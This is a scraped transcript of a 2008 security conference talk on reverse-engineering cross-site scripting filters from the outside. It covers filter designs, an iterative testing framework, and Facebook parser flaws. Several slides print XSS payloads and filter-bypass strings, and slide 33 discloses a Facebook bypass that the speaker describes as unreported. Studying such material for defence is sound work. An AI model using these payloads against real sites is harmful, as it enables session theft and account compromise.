Presentation is loading. Please wait.

Presentation is loading. Please wait.

Blackbox Reversing of XSS Filters

Published byMaximilian Sharp Modified over 7 years ago

Similar presentations

Presentation on theme: "Blackbox Reversing of XSS Filters"— Presentation transcript:

1 Blackbox Reversing of XSS Filters
Alexander Sotirov ekoparty 2008

2 Introduction Web applications are the future Reversing web apps
blackbox reversing very different environment and tools Cross-site scripting (XSS) the “strcpy” of web app development reversing and bypassing XSS filters

3 Overview User generated content and Web 2.0 Implementing XSS filters
Reversing XSS filters XSS in Facebook

4 Part I User generated content and Web 2.0

5 Web 2.0 User generated content APIs Mashups
Aggregation of untrusted content Significantly increased attack surface

6 User generated content
Text Plaintext Lightweight markup (BBcode, Wikipedia) Limited HTML Full HTML and JavaScript Images, sound, video Flash

7 Attacker generated content
Social networking Samy’s MySpace worm multiple Orkut worms, stealing bank info Webmail Hotmail and Yahoo Mail cross-site scripting worm written by SkyLined in 2002 many SquirrelMail cross-site scripting bugs Blogs hacking WordPress with XSS

8 Cross site scripting (XSS)
Request: Response: <html> <body> <p>Hello <script>alert('XSS')</script></p> </body> </html>

9 Web security model Same origin policy
Prevents scripts from one domain from manipulating documents loaded from other domains Cross site scripting allows us to execute arbitrary scripts on a page loaded from another domain

10 What can XSS do? Stealing data from web pages
Capturing keystrokes on a web page Stealing authentication cookies Arbitrary HTTP requests with XMLHttpRequest

11 Part II Implementing XSS filters

12 XSS filters Goal: Remove all scripts from untrusted HTML Challenges:
Many HTML features that allow scripting Proprietary extensions to HTML Parsing invalid HTML Browser bugs

13 Features that allow scripting
Script tags <script src=" Event handler attributes <body onload="alert('XSS')"> CSS <p style="background:url('javascript:alert(1)')"> URLs <img src="javascript:alert('XSS')">

14 Proprietary extensions to HTML
XML data islands (IE) <xml src=" id="x"> <span datasrc="#x" datafld="c" dataformatas="html"> JavaScript expressions in attribute (NS4) <p id="&{alert('XSS')}"> Conditional comments (IE) <!--[if gte IE 4]> <script>alert('XSS')</script> <![endif]-->

15 Parsing invalid HTML <<scr\0ipt/src= extra '<' before opening tag NULL byte inside tag name '/' separator between tag and attribute no quotes around attribute value missing '>' in closing tag Browser behavior is not documented or standardized. IE7 parses this as: <script src="

16 Browser bugs Invalid UTF8 handling in Internet Explorer 6
<body foo="\xC0" bar=" onload=alert(1);//"> Firefox and IE7: <body foo="?" bar=" onload=alert(1);//"> IE6: <body foo="? bar=" onload=alert(1);//"> Attribute parsing in Firefox < <body

17 Implementing XSS filters
String matching filters HTML DOM parsers Canonicalization Whitelisting

18 String matching filters
Remove all script tags: s/<script>//g; Bypasses: Invalid HTML accepted by browsers Encoding of attribute values and URLs Using the filter against itself: <scr<script>ipt> Incomplete blacklists

19 HTML DOM parsers <body onload="alert(1)"> <script>alert(2)</script> <p>Hello</p> </body> <body> onload "alert(1)" <script> "alert(2)" <p> "Hello"

20 Canonicalization Build a DOM tree from the input stream
handle invalid UTF8 sequences Apply XSS filters to the DOM tree Output the DOM tree in a canonical form escape special characters add closing tags where necessary

21 Whitelisting Blacklisting Whitelisting
remove known bad tags and attributes must be 100% complete to be safe Whitelisting allow only known safe tags and attributes safer than blacklisting

22 Part III Reversing XSS filters

23 Reversing XSS filters Remote web applications Fuzzing
no access to source code or binaries Fuzzing limited by bandwidth and request latency draws attention Blackbox reversing send input and inspect the output build a filter model based on its behavior

24 Iterative model generation
Build an initial model of the filter Generate a test case Send test case and inspect the result Update the model Go to step 2

25 Example of parser reversing
Test case: (1..0xFF).each { |x| data << "<p #{x.chr}a=''></p>" } Results: whitespace regexp [\x08\t\r\n "'/]+ attribute name regexp [a-zA-Z0-9:-_]+

26 refltr.rb Framework for XSS filter reversing Application modules
run a set of tests against a web application store the results manual analysis of the output result diffing Application modules abstract application specific details sending data, result parsing, error detection Test modules test generation functions

27 Using the model Grammar based analysis
build a grammar for the filter output build a grammar for the browser parser find a valid sentence in both grammars that includes a <script> tag Reimplement the filter and fuzz it locally

28 Part IV XSS in Facebook

29 Facebook platform Third party applications FBML FBJS application pages
content in user profiles message and wall post attachments FBML HTML with a few restrictions limited style sheet and scripting support FBJS sandboxed JavaScript

30 FBML processing Facebook serves as a proxy for application content
GET /funapp/foo.html GET /foo.html browser apps.facebook.com funapp.example.com HTML FBML Facebook serves as a proxy for application content FBML processing: special FBML tags are replaced with HTML non-supported HTML tags are removed scripts are sandboxed

31 Reversing the FBML parser
refltr.rb HTML apps.facebook.com write test case in /var/www FBML apache HTML DOM parser Accepts and fixes invalid input Canonicalized output Whitelist of tags, blacklist of attributes

32 Facebook XSS Invalid UTF8 sequences Code:
input is parsed as ASCII HTTP response headers specify UTF8 encoding affects only IE6 Code: <img src="…" foo="\xC0" bar="onload=alert(1);//"> Reported and fixed in February.

33 This is where I drop the 0day
Attribute name parsing mismatch between Facebook and Firefox parsers affects only Firefox < Code: <img src="…" onload:="alert(1)"> Not reported, Facebook is still vulnerable.

34 Facebook Demo

35 Part V Conclusion

36 Conclusion Web 2.0 sites are totally screwed Blackbox reversing
broken web security model undocumented browser behavior no programming language support Blackbox reversing the only way to reverse most web apps we need better tools and automation

37 Questions?

Download ppt "Blackbox Reversing of XSS Filters"

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross Site Scripting (XSS)

Cross Site Scripting (XSS)
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
JavaScript and AJAX Jonathan Foss University of Warwick

JavaScript and AJAX Jonathan Foss University of Warwick
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
THE BROKEN WEB A Systematic Analysis of XSS Sanitization in Web Application Frameworks.

THE BROKEN WEB A Systematic Analysis of XSS Sanitization in Web Application Frameworks.
HTML 5 and CSS 3, Illustrated Complete Unit L: Programming Web Pages with JavaScript.

HTML 5 and CSS 3, Illustrated Complete Unit L: Programming Web Pages with JavaScript.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
The XSS Files Find, Exploit, and Eliminate. Josh Little Security Engineer at global vertical market business intelligence company. 9 years in application.

The XSS Files Find, Exploit, and Eliminate. Josh Little Security Engineer at global vertical market business intelligence company. 9 years in application.
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
An Evaluation of the Google Chrome Extension Security Architecture

An Evaluation of the Google Chrome Extension Security Architecture
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.

Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
World Wide Web1 Applications World Wide Web. 2 Introduction What is hypertext model? Use of hypertext in World Wide Web (WWW) – HTML. WWW client-server.

World Wide Web1 Applications World Wide Web. 2 Introduction What is hypertext model? Use of hypertext in World Wide Web (WWW) – HTML. WWW client-server.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
1 Subspace: Secure Cross Domain Communication for Web Mashups Collin Jackson and Helen J. Wang Mamadou H. Diallo.

1 Subspace: Secure Cross Domain Communication for Web Mashups Collin Jackson and Helen J. Wang Mamadou H. Diallo.
HTML5. What is HTML5? HTML5 will be the new standard for HTML. HTML5 is the next generation of HTML. HTML5 is still a work in progress. However, the major.

HTML5. What is HTML5? HTML5 will be the new standard for HTML. HTML5 is the next generation of HTML. HTML5 is still a work in progress. However, the major.
Computer Concepts 2014 Chapter 7 The Web and E-mail.

Computer Concepts 2014 Chapter 7 The Web and .

Similar presentations

Ads by Google